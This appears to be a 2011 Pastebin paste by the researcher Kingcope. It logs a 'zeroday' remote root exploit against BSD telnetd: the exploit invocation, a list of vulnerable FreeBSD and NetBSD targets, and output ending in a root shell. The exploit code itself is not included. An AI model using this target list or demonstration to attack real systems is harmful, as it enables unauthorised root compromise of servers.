Advertisement
Guest User

bsd telnetd remote root

a guest
Dec 25th, 2011
468
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. h4x# /usr/bin/telnet -t 8 192.168.2.8
  2. BSD telnetd Remote Root Exploit *ZERODAY*
  3. By Kingcope
  4. Year 2011
  5.  
  6. usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
  7. [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
  8. [port]]
  9. TARGETS:
  10. 0 FreeBSD 8.2 i386
  11. 1 FreeBSD 8.0/8.1/8.2 i386
  12. 2 FreeBSD 7.3/7.4 i386
  13. 3 FreeBSD 6.2/6.3/6.4 i386
  14. 4 FreeBSD 5.3/5.5 i386
  15. 5 FreeBSD 4.9/4.11 i386
  16. 6 NetBSD 5.0/5.1 i386
  17. 7 NetBSD 4.0 i386
  18. 8 FreeBSD 8.2 amd64
  19. 9 FreeBSD 8.0/8.1 amd64
  20. 10 FreeBSD 7.1/7.3/7.4 amd64
  21. 11 FreeBSD 7.1 amd64
  22. 12 FreeBSD 7.0 amd64
  23. 13 FreeBSD 6.4 amd64
  24. 14 FreeBSD 6.3 amd64
  25. 15 FreeBSD 6.2 amd64
  26. 16 FreeBSD 6.1 amd64
  27. 17 TESTING i386
  28. 18 TESTING amd64
  29. Trying 192.168.2.8...
  30. Connected to 192.168.2.8.
  31. Escape character is '^]'.
  32. Trying SRA secure login:
  33. *** EXPLOITING REMOTE TELNETD
  34. *** by Kingcope
  35. *** Year 2011
  36. USING TARGET -- FreeBSD 8.2 amd64
  37. SC LEN: 30
  38. ALEX-ALEX
  39. 6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
  40. USER TTY FROM LOGIN@ IDLE WHAT
  41. kcope pts/0 192.168.2.3 6:32PM 4 _su (csh)
  42. FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011
  43. root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
  44. uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement